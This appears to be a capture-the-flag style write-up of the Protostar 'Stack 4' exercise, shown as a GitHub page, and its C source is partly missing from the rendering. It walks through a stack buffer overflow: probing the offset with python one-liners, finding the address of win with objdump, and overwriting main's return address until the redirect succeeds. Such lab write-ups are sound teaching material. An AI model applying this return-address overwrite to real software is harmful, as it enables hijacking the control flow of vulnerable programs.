Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
87 lines (62 sloc) 2.01 KB

Stack 4


To call the win function.

Source Code


#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
  printf("code flow successfully changed\n");

int main(int argc, char **argv)
  char buffer[64];



In this case, we can see that we actually don't have a variable to override, but we have to override the return pointer of the main function. Thus, we have to figure out how far away this return address is from the address of the buffer in order to know how many characters to put into buffer to get to the return address. We know that the return address will be at least 64 bytes away from the beginning of the buffer. I tried different amounts of characters put into the program to see how far away we were:

$ python -c 'print "a"*64' | ./stack4
$ python -c 'print "a"*68' | ./stack4
$ python -c 'print "a"*72' | ./stack4
$ python -c 'print "a"*84' | ./stack4
Segmentation fault
$ python -c 'print "a"*76' | ./stack4
Segmentation fault
$ python -c 'print "a"*74' | ./stack4
$ python -c 'print "a"*75' | ./stack4

Okay, so we know that putting at least 76 bytes into the buffer will overwrite the return address (causing the SEGFAULT above). We're on a 32-bit system, so we know that the return address is 4 bytes. Let's try putting 72 'a's and then the address of win into the buffer. As before, we found the address of win using objdump:

$ objdump -D ./stack4 | grep win
080483f4 <win>:

Let's try it:

$ python -c 'print "a"*72 + "\x08\x04\x83\xf4"[::-1]' | ./stack4
Segmentation fault

Hmm, maybe we went too far?

$ python -c 'print "a"*70 + "\x08\x04\x83\xf4"[::-1]' | ./stack4

Nope, not too far. Let's go farther:

$ python -c 'print "a"*74 + "\x08\x04\x83\xf4"[::-1]' | ./stack4
Segmentation fault
$ python -c 'print "a"*76 + "\x08\x04\x83\xf4"[::-1]' | ./stack4
code flow successfully changed
Segmentation fault

Perfect, we did it!